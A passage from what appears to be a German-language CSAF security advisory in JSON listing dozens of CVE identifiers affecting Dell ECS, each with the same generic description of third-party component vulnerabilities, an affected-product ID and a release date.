"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-20567"
},
{
"cve": "CVE-2022-2068",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2068"
},
{
"cve": "CVE-2022-2097",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2097"
},
{
"cve": "CVE-2022-21216",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-21216"
},
{
"cve": "CVE-2022-21233",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-21233"
},
{
"cve": "CVE-2022-2124",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2124"
},
{
"cve": "CVE-2022-2125",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2125"
},
{
"cve": "CVE-2022-2126",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2126"
},
{
"cve": "CVE-2022-2129",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2129"
},
{
"cve": "CVE-2022-21363",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-21363"
},
{
"cve": "CVE-2022-21385",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-21385"
},
{
"cve": "CVE-2022-21499",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-21499"
},
{
"cve": "CVE-2022-2153",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2153"
},
{
"cve": "CVE-2022-21540",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-21540"
},
{
"cve": "CVE-2022-21541",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-21541"
},
{
"cve": "CVE-2022-21549",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-21549"
},
{
"cve": "CVE-2022-21618",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-21618"
},
{
"cve": "CVE-2022-21619",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-21619"
},
{
"cve": "CVE-2022-21624",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-21624"
},
{
"cve": "CVE-2022-21626",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-21626"
},
{
"cve": "CVE-2022-21628",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-21628"
},
{
"cve": "CVE-2022-21702",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-21702"
},
{
"cve": "CVE-2022-2175",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2175"
},
{
"cve": "CVE-2022-2182",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2182"
},
{
"cve": "CVE-2022-2183",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2183"
},
{
"cve": "CVE-2022-2206",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2206"
},
{
"cve": "CVE-2022-2207",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2207"
},
{
"cve": "CVE-2022-2208",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2208"
},
{
"cve": "CVE-2022-2210",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2210"
},
{
"cve": "CVE-2022-2231",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2231"
},
{
"cve": "CVE-2022-2256",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2256"
},
{
"cve": "CVE-2022-2257",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2257"
},
{
"cve": "CVE-2022-2264",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2264"
},
{
"cve": "CVE-2022-2284",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2284"
},
{
"cve": "CVE-2022-2285",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2285"
},
{
"cve": "CVE-2022-2286",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2286"
},
{
"cve": "CVE-2022-2287",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2287"
},
{
"cve": "CVE-2022-22976",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-22976"
},
{
"cve": "CVE-2022-22978",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-22978"
},
{
"cve": "CVE-2022-2304",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2304"
},
{
"cve": "CVE-2022-2318",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2318"
},
{
"cve": "CVE-2022-23302",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-23302"
},
{
"cve": "CVE-2022-23305",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-23305"
},
{
"cve": "CVE-2022-23307",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-23307"
},
{
"cve": "CVE-2022-2343",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2343"
},
{
"cve": "CVE-2022-2344",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
